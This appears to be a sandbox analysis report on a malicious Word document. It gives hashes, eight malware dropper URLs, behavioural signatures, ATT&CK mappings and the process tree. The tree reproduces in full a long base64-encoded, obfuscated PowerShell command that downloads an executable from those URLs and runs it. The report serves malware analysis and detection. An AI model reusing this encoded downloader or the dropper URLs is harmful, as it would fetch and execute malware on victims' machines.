21509e892c4ef6e47bd2fe0d2290b20e48e4680f2f3537f12a061cd5912b1cac

General

Target

21509e892c4ef6e47bd2fe0d2290b20e48e4680f2f3537f12a061cd5912b1cac.doc
Size

218KB
MD5

8d7f667c5911d8e6c24bcbdbfe56b497
SHA1

e13f9c603441f701c0ca9a53bb9b69eb5cb071a9
SHA256

21509e892c4ef6e47bd2fe0d2290b20e48e4680f2f3537f12a061cd5912b1cac
SHA512

cc60e5138a4f1ff38329f30507a2840550758ca1bc0469f9c347ed735eb55b9af8ae69eb0dd646d4a22189e38812a6b386d66c7df3a25d3d770297556993b9e0

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://www.saintmarcel.com/wp-includes/VKbL2/

exe.dropper

https://gayatrienterprise.org/wp-admin/DPBsj/

exe.dropper

https://weparditestaa.fi/wp-admin/72uPk/

exe.dropper

https://blog.6b47.com/Assets/w5U/

exe.dropper

https://www.easeiseasy.com/wp-admin/q/

exe.dropper

https://ursuperstar.com/wp-admin/AAxKlbV/

exe.dropper

https://kramedas.lt/wp-admin/E9Gciyc/

exe.dropper

https://critical-thinking.fr/wp-includes/vHQWren/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

POwersheLL.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3696	3032	POwersheLL.exe

Blacklisted process makes network request 2 IoCs

Processes:

POwersheLL.exe

flow pid process

19 3696 POwersheLL.exe
23 3696 POwersheLL.exe
Executes dropped EXE 1 IoCs

Processes:

R1s2f0emk.exe

pid process

3868 R1s2f0emk.exe

flow	pid	process
19	3696	POwersheLL.exe
23	3696	POwersheLL.exe

pid	process
3868	R1s2f0emk.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Modifies data under HKEY_USERS 1 IoCs

Processes:

svchost.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\NGC\SoftLockoutVolatileKey svchost.exe
Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

2168 WINWORD.EXE
2168 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

POwersheLL.exe

pid process

3696 POwersheLL.exe
3696 POwersheLL.exe
3696 POwersheLL.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

POwersheLL.exe

description pid process

Token: SeDebugPrivilege 3696 POwersheLL.exe
Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

WINWORD.EXER1s2f0emk.exe

pid process

2168 WINWORD.EXE
2168 WINWORD.EXE
2168 WINWORD.EXE
2168 WINWORD.EXE
2168 WINWORD.EXE
2168 WINWORD.EXE
2168 WINWORD.EXE
3868 R1s2f0emk.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\NGC\SoftLockoutVolatileKey	svchost.exe

pid	process
2168	WINWORD.EXE
2168	WINWORD.EXE

pid	process
3696	POwersheLL.exe
3696	POwersheLL.exe
3696	POwersheLL.exe

description	pid	process
Token: SeDebugPrivilege	3696	POwersheLL.exe

pid	process
2168	WINWORD.EXE
2168	WINWORD.EXE
2168	WINWORD.EXE
2168	WINWORD.EXE
2168	WINWORD.EXE
2168	WINWORD.EXE
2168	WINWORD.EXE
3868	R1s2f0emk.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\21509e892c4ef6e47bd2fe0d2290b20e48e4680f2f3537f12a061cd5912b1cac.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2168

C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
POwersheLL -ENCOD UwBlAHQALQBJAFQARQBNACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBQAFYASgBVACAAIAAoACAAIABbAHQAWQBQAEUAXQAoACIAewAzAH0AewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAgACcARQBNAC4AJwAsACcAaQBvAC4ARABpAHIAZQAnACwAJwBjAFQAbwByAFkAJwAsACcAUwB5AHMAVAAnACkAKQAgADsAIAAgACQARABUAE4AbQByAD0AIAAgAFsAVAB5AFAAZQBdACgAIgB7ADAAfQB7ADMAfQB7ADQAfQB7ADIAfQB7ADEAfQB7ADUAfQAiACAALQBGACcAcwB5AHMAdABlAE0ALgBuAEUAdAAuAFMAZQBSAHYASQBjAGUAJwAsACcAYQBuACcALAAnAFQAbQAnACwAJwBwACcALAAnAG8ASQBuACcALAAnAGEARwBlAFIAJwApACAAOwAgACQAVgB3ADYAMQB2AHAAdQA9ACgAJwBCACcAKwAoACcAMgAnACsAJwBoAHcAOQAnACkAKwAnADIAeAAnACkAOwAkAEUAagAyAHAAMQA1ADIAPQAkAEEAMwBhAHMANwBxAGEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFIAZAA5AGwAdgB4AG8AOwAkAE8AdQB2AGQAXwBhAG0APQAoACcAVwAnACsAKAAnAGUAMQAnACsAJwBfACcAKQArACgAJwAzACcAKwAnADMAcAAnACkAKQA7ACAAKAAgAGcASQAgACAAVgBhAFIASQBhAGIATABlADoAcAB2AGoAdQAgACkALgBWAEEAbAB1AGUAOgA6ACIAQwBgAFIARQBBAHQAZQBkAGAASQByAGAARQBDAHQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnADcAJwArACcAbwBQAFEAJwApACsAKAAnAHEANQA0ACcAKwAnADEAMAAnACsAJwBvADcAbwBQAFkAcQAnACkAKwAnAHIAdAAnACsAKAAnAGgAdAAxACcAKwAnADcAbwAnACkAKwAnAFAAJwApACAAIAAtAEMAcgBFAFAATABBAGMAZQAoAFsAQwBIAEEAUgBdADUANQArAFsAQwBIAEEAUgBdADEAMQAxACsAWwBDAEgAQQBSAF0AOAAwACkALABbAEMASABBAFIAXQA5ADIAKQApADsAJABVADUAcwBxAHQAaABrAD0AKAAoACcAUAAnACsAJwBlAGMAJwApACsAKAAnAHMAcgBqACcAKwAnAGUAJwApACkAOwAgACgAIAAgAEcAZQB0AC0AVgBhAHIASQBhAGIATABlACAARAB0AG4ATQBSACkALgB2AEEATABVAEUAOgA6ACIAcwBlAEMAdQByAGAASQBUAGAAeQBQAFIATwB0AG8AQwBPAGwAIgAgAD0AIAAoACgAJwBUAGwAJwArACcAcwAnACkAKwAnADEAMgAnACkAOwAkAEkAdgBjAG4AZgB1AHoAPQAoACcATAAzACcAKwAnAHgAMwAnACsAKAAnADIAJwArACcAYQAwACcAKQApADsAJABNADMAegB5ADkAMQBqACAAPQAgACgAJwBSADEAJwArACgAJwBzACcAKwAnADIAZgAnACkAKwAnADAAJwArACgAJwBlAG0AJwArACcAawAnACkAKQA7ACQATQA2ADkANgAzAHgAYQA9ACgAKAAnAFEAJwArACcAZwAxACcAKQArACgAJwBiAGQAJwArACcAagAnACkAKwAnAGYAJwApADsAJABaADIAdgB0AHgAdgBnAD0AKAAoACcAVgAyADIAJwArACcAbgAnACkAKwAnAGsAbgAnACsAJwByACcAKQA7ACQAVABqAG0AbwA3AHkAZgA9ACQASABPAE0ARQArACgAKAAoACcAUgAnACsAJwBsAGUAJwArACcAUQBxADUAJwApACsAKAAnADQAMQAnACsAJwAwACcAKQArACcAbwBSACcAKwAnAGwAZQAnACsAKAAnAFkAcQAnACsAJwByAHQAJwApACsAKAAnAGgAdAAxAFIAJwArACcAbAAnACkAKwAnAGUAJwApAC4AIgBSAEUAUABgAEwAYABBAEMAZQAiACgAKAAnAFIAJwArACcAbABlACcAKQAsAFsAUwBUAHIASQBuAGcAXQBbAEMAaABhAHIAXQA5ADIAKQApACsAJABNADMAegB5ADkAMQBqACsAKAAnAC4AJwArACgAJwBlAHgAJwArACcAZQAnACkAKQA7ACQAQwA4AGMANgBkAHcAYQA9ACgAJwBUACcAKwAoACcAcQAnACsAJwBuADMAJwApACsAKAAnAGcAJwArACcAeAB4ACcAKQApADsAJABYADAAMgB2AGIAYwBuAD0ALgAoACcAbgBlACcAKwAnAHcALQAnACsAJwBvAGIAagBlAGMAdAAnACkAIABOAEUAdAAuAHcAZQBCAEMATABpAEUATgBUADsAJABBAGQANAAwAGwAOABoAD0AKAAoACgAKAAnAGgAdAB0AHAAcwAnACsAJwA6AF0AWwAgADEAKQAnACsAJwAgACcAKwAnAGoAagBrAGcAJwArACcAUwAgAFsAXQAgACcAKwAnAFsAXQB3ACcAKwAnAF0AWwAgADEAKQAgAGoAagBrAGcAUwAnACsAJwAgAFsAJwArACcAXQAgACcAKwAnAFsAXQB3AHcAdwB3ACcAKwAnAC4AcwBhAGkAbgAnACkAKQArACgAKAAnAHQAbQBhAHIAYwAnACsAJwBlAGwAJwArACcALgBjAG8AbQAnACsAJwBdAFsAIAAnACsAJwAxACcAKwAnACkAIAAnACsAJwBqACcAKwAnAGoAJwArACcAawBnAFMAIAAnACsAJwBbAF0AIABbAF0AdwB3AHAALQAnACsAJwBpAG4AYwBsAHUAZABlAHMAXQBbACAAMQApACAAJwArACcAagBqAGsAZwBTACAAWwBdACAAWwBdACcAKwAnAHcAJwArACcAVgBLAGIATAAyAF0AWwAgADEAKQAgAGoAagBrAGcAJwArACcAUwAgAFsAJwApACkAKwAoACgAJwBdACAAJwArACcAWwBdACcAKwAnAHcAQABoAHQAJwArACcAdABwAHMAJwArACcAOgBdAFsAJwArACcAIAAxACcAKwAnACkAJwArACcAIABqAGoAJwArACcAawBnAFMAIABbAF0AJwArACcAIABbACcAKwAnAF0AdwBdAFsAJwArACcAIAAxACcAKwAnACkAIABqAGoAawBnAFMAIABbAF0AIAAnACsAJwBbAF0AJwArACcAdwBnAGEAeQBhAHQAcgBpAGUAbgB0AGUAcgBwAHIAJwApACkAKwAoACgAJwBpAHMAZQAuAG8AJwArACcAcgBnAF0AWwAgADEAKQAgAGoAJwArACcAagAnACsAJwBrACcAKQApACsAKAAoACcAZwBTACAAJwArACcAWwAnACsAJwBdACAAWwAnACsAJwBdAHcAdwBwACcAKwAnAC0AYQBkAG0AaQBuAF0AWwAgADEAKQAgACcAKwAnAGoAagBrAGcAUwAgACcAKwAnAFsAXQAgAFsAXQB3AEQAUABCAHMAJwArACcAagBdAFsAIAAxACkAIABqAGoAJwArACcAawBnAFMAJwApACkAKwAoACcAIABbAF0AIAAnACsAJwBbAF0AdwAnACsAJwBAAGgAdAAnACkAKwAoACgAJwB0AHAAcwAnACsAJwA6ACcAKwAnAF0AWwAnACsAJwAgACcAKwAnADEAKQAgAGoAagBrAGcAJwArACcAUwAgAFsAXQAgAFsAXQAnACsAJwB3AF0AWwAnACsAJwAgACcAKQApACsAKAAoACcAMQApACAAJwArACcAagBqAGsAJwArACcAZwAnACsAJwBTACcAKwAnACAAJwArACcAWwBdACcAKwAnACAAWwBdAHcAdwBlAHAAJwArACcAYQAnACsAJwByAGQAJwArACcAaQB0AGUAJwArACcAcwAnACsAJwB0AGEAYQAuAGYAaQBdAFsAIAAxACcAKwAnACkAIAAnACsAJwBqAGoAawBnAFMAIABbAF0AJwArACcAIABbAF0AdwAnACkAKQArACgAKAAnAHcAJwArACcAcAAtACcAKwAnAGEAJwArACcAZABtAGkAbgAnACsAJwBdACcAKwAnAFsAIAAnACsAJwAxACcAKwAnACkAIABqAGoAJwArACcAawBnAFMAIABbAF0AIABbAF0AdwA3ADIAdQAnACkAKQArACgAKAAnAFAAawBdAFsAIAAxACcAKwAnACkAJwArACcAIAAnACsAJwBqAGoAawBnAFMAJwArACcAIABbACcAKwAnAF0AIAAnACsAJwBbAF0AdwBAACcAKwAnAGgAdAB0AHAAcwAnACsAJwA6AF0AJwArACcAWwAgADEAKQAgACcAKwAnAGoAJwApACkAKwAoACcAagAnACsAJwBrAGcAUwAgACcAKQArACgAKAAnAFsAJwArACcAXQAgACcAKwAnAFsAXQB3ACcAKwAnAF0AWwAgADEAKQAnACsAJwAgAGoAagAnACsAJwBrACcAKwAnAGcAJwArACcAUwAnACsAJwAgAFsAXQAgAFsAXQB3AGIAbABvACcAKwAnAGcALgA2AGIANAA3ACcAKwAnAC4AYwBvAG0AXQBbACAAJwArACcAMQApACcAKQApACsAKAAnACAAagBqAGsAJwArACcAZwBTACAAJwArACcAWwBdACAAWwAnACsAJwBdAHcAQQBzAHMAZQB0AHMAXQBbACcAKQArACgAKAAnACAAMQApACAAJwArACcAagBqACcAKwAnAGsAJwArACcAZwAnACsAJwBTACAAWwBdACAAWwBdAHcAdwA1AFUAXQBbACcAKwAnACAAMQAnACsAJwApACAAagBqAGsAJwArACcAZwAnACsAJwBTACcAKwAnACAAWwAnACsAJwBdACcAKQApACsAKAAnACAAJwArACcAWwBdAHcAQAAnACkAKwAoACcAaAB0AHQAJwArACcAcAAnACkAKwAoACgAJwBzACcAKwAnADoAXQAnACsAJwBbACAAMQApACAAagBqACcAKwAnAGsAZwBTACAAWwBdACAAJwArACcAWwBdAHcAXQBbACAAMQApACAAJwArACcAagBqACcAKwAnAGsAZwBTACAAJwArACcAWwBdACcAKwAnACAAWwBdAHcAJwArACcAdwB3AHcALgBlAGEAcwBlAGkAcwBlACcAKQApACsAKAAoACcAYQAnACsAJwBzAHkAJwArACcALgBjAG8AbQBdAFsAIAAxACkAIABqAGoAawBnACcAKwAnAFMAIAAnACsAJwBbACcAKwAnAF0AJwArACcAIABbACcAKwAnAF0AdwB3ACcAKwAnAHAAJwApACkAKwAoACgAJwAtAGEAZABtAGkAbgBdAFsAIAAxACkAIABqAGoAJwArACcAawBnAFMAIAAnACsAJwBbAF0AIABbAF0AdwBxAF0AJwArACcAWwAnACsAJwAgACcAKwAnADEAKQAgACcAKwAnAGoAJwArACcAagAnACsAJwBrAGcAJwArACcAUwAnACsAJwAgACcAKwAnAFsAXQAgACcAKwAnAFsAXQB3AEAAJwArACcAaAB0ACcAKwAnAHQAJwArACcAcABzACcAKwAnADoAJwArACcAXQBbACAAMQApACcAKwAnACAAJwArACcAagAnACsAJwBqAGsAZwBTACAAJwArACcAWwBdACAAWwBdAHcAXQBbACAAMQAnACsAJwApACAAagBqAGsAZwBTACAAWwBdACcAKwAnACAAWwBdAHcAJwArACcAdQByACcAKwAnAHMAdQBwAGUAcgBzACcAKwAnAHQAYQByAC4AJwArACcAYwAnACkAKQArACgAKAAnAG8AbQBdAFsAJwArACcAIAAxACkAIAAnACsAJwBqAGoAawAnACkAKQArACgAJwBnACcAKwAnAFMAIABbAF0AIABbAF0AdwAnACkAKwAoACgAJwB3AHAALQBhACcAKwAnAGQAbQAnACsAJwBpAG4AXQBbACAAMQApACAAagAnACsAJwBqACcAKwAnAGsAZwAnACsAJwBTACcAKwAnACAAJwArACcAWwBdACAAWwBdACcAKwAnAHcAQQBBAHgAJwArACcASwBsAGIAVgBdAFsAJwArACcAIAAxACcAKwAnACkAIABqAGoAJwArACcAawAnACsAJwBnAFMAIAAnACsAJwBbAF0AIAAnACsAJwBbAF0AdwBAAGgAJwArACcAdAB0AHAAcwA6AF0AWwAgADEAJwArACcAKQAnACsAJwAgAGoAagBrAGcAUwAgACcAKQApACsAKAAoACcAWwAnACsAJwBdACAAWwBdAHcAXQBbACAAMQApACAAagBqAGsAZwAnACsAJwBTACcAKwAnACAAWwBdACcAKwAnACAAWwBdACcAKQApACsAKAAoACcAdwBrAHIAYQBtACcAKwAnAGUAZABhAHMALgBsAHQAXQBbACAAMQAnACsAJwApACAAagBqAGsAZwBTACAAJwArACcAWwAnACsAJwBdACAAJwArACcAWwBdAHcAdwBwAC0AJwApACkAKwAoACgAJwBhAGQAbQBpAG4AXQBbACcAKwAnACAAMQApACAAagAnACsAJwBqAGsAZwBTACAAWwBdACAAWwBdACcAKwAnAHcARQAnACsAJwA5ACcAKwAnAEcAYwAnACsAJwBpAHkAYwBdAFsAIAAxACkAIABqAGoAawAnACsAJwBnACcAKwAnAFMAIABbAF0AIABbAF0AdwBAAGgAdAB0AHAAcwA6AF0AWwAgADEAKQAnACsAJwAgAGoAagAnACsAJwBrACcAKwAnAGcAUwAgACcAKwAnAFsAXQAgAFsAJwArACcAXQB3AF0AJwArACcAWwAgADEAKQAgACcAKwAnAGoAJwArACcAagBrACcAKwAnAGcAUwAgAFsAXQAgAFsAXQB3ACcAKwAnAGMAcgBpACcAKQApACsAKAAnAHQAaQBjAGEAbAAtAHQAaAAnACsAJwBpAG4AawBpACcAKwAnAG4AJwArACcAZwAuACcAKQArACgAKAAnAGYAJwArACcAcgAnACsAJwBdAFsAIAAxACkAIABqAGoAawBnACcAKwAnAFMAIABbAF0AIAAnACsAJwBbAF0AdwAnACsAJwB3ACcAKwAnAHAALQAnACkAKQArACcAaQAnACsAKAAoACcAbgBjAGwAdQBkAGUAcwBdAFsAIAAnACsAJwAxACkAJwArACcAIAAnACkAKQArACgAJwBqAGoAJwArACcAawBnACcAKwAnAFMAJwArACcAIABbAF0AIABbAF0AdwAnACkAKwAoACgAJwB2AEgAJwArACcAUQAnACsAJwBXAHIAZQBuAF0AWwAgADEAKQAgAGoAagBrAGcAUwAgACcAKwAnAFsAJwArACcAXQAgAFsAXQB3ACcAKQApACkAKQAuACIAUgBFAGAAUABMAEEAYABDAGUAIgAoACgAKAAoACcAXQBbACAAJwArACcAMQAnACkAKwAoACgAJwApACAAJwApACkAKwAoACcAagBqAGsAJwArACcAZwBTACcAKwAnACAAWwBdACAAWwAnACsAJwBdACcAKQArACcAdwAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcALwAnACkALAAoACcAeAAnACsAJwB3AGUAJwApACkAWwAwAF0AKQAuACIAUwBgAHAAbABJAHQAIgAoACQAUAB5ADAAbgAzADMAdgAgACsAIAAkAEUAagAyAHAAMQA1ADIAIAArACAAJABSADIAYgBhADcAeABhACkAOwAkAFMAXwA5AGcAaABsAG4APQAoACgAJwBUACcAKwAnAHYAMgBoACcAKQArACcAaAAnACsAJwBvAGEAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABYAGMAbgB1ADMAYQBsACAAaQBuACAAJABBAGQANAAwAGwAOABoACkAewB0AHIAeQB7ACQAWAAwADIAdgBiAGMAbgAuACIARABPAHcAbgBMAE8AYQBEAGAARgBgAGkAbABlACIAKAAkAFgAYwBuAHUAMwBhAGwALAAgACQAVABqAG0AbwA3AHkAZgApADsAJABDAHMAMgB4AG8AZQAwAD0AKAAoACcASQBmAGYAbgAnACsAJwB1ACcAKQArACcAXwBkACcAKQA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABUAGoAbQBvADcAeQBmACkALgAiAEwAYABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAAzADIANAA0ADMAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACgAKAAnAHcAaQAnACsAJwBuADMAJwApACsAKAAnADIAJwArACcAXwBQACcAKQArACcAcgBvACcAKwAoACcAYwBlACcAKwAnAHMAcwAnACkAKQApAC4AIgBjAFIAZQBhAGAAVABFACIAKAAkAFQAagBtAG8ANwB5AGYAKQA7ACQAQwBjAGcAegByAGIAbAA9ACgAKAAnAE8AJwArACcAdwBnAGEAbwAxACcAKQArACcAawAnACkAOwBiAHIAZQBhAGsAOwAkAFYAOQBvADcAbwA3AHcAPQAoACgAJwBQADYAJwArACcAYwBmAGEAJwApACsAJwA1ADMAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABRADMAZQBsADYAcwB4AD0AKAAnAEwAbQAnACsAJwA1AHMAJwArACgAJwAzACcAKwAnAG0AOQAnACkAKQA=
1⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3696

C:\Users\Admin\Qq5410o\Yqrtht1\R1s2f0emk.exe
C:\Users\Admin\Qq5410o\Yqrtht1\R1s2f0emk.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3868

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NgcSvc
1⤵
PID:1868

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s DeviceAssociationService
1⤵
PID:2664

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s NgcCtnrSvc
1⤵
- Modifies data under HKEY_USERS
PID:3992

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Qq5410o\Yqrtht1\R1s2f0emk.exe
MD5
4008b2ab3e959dc7b1bd7f62996e66bb

SHA1
7e344f5151d2908c1564fd84645fc1be91696926

SHA256
9654b16bba5f5891b86cabf640e7152899831d9c9e51c5a3bf6428d135c1623d

SHA512
10f8eee6a02ae792048e37301512dfc757246a497cb198dd11bcae8a1169d38f23ffa3405a031ee1b69b51c3ad0c3bf3f5eb98bfd122190d81077d0fdc5418b3

Download Submit
C:\Users\Admin\Qq5410o\Yqrtht1\R1s2f0emk.exe
MD5
4008b2ab3e959dc7b1bd7f62996e66bb

SHA1
7e344f5151d2908c1564fd84645fc1be91696926

SHA256
9654b16bba5f5891b86cabf640e7152899831d9c9e51c5a3bf6428d135c1623d

SHA512
10f8eee6a02ae792048e37301512dfc757246a497cb198dd11bcae8a1169d38f23ffa3405a031ee1b69b51c3ad0c3bf3f5eb98bfd122190d81077d0fdc5418b3

Download Submit
memory/2168-0-0x00007FFBC2AC0000-0x00007FFBC30F7000-memory.dmp

Filesize
6.2MB

Download
memory/2168-3-0x000002223B5A6000-0x000002223B5AB000-memory.dmp

Filesize
20KB

Download
memory/3696-9-0x00007FFBB45F0000-0x00007FFBB4FDC000-memory.dmp

Filesize
9.9MB

Download
memory/3696-10-0x00000250A66F0000-0x00000250A66F1000-memory.dmp

Filesize
4KB

Download
memory/3696-11-0x00000250A6B60000-0x00000250A6B61000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads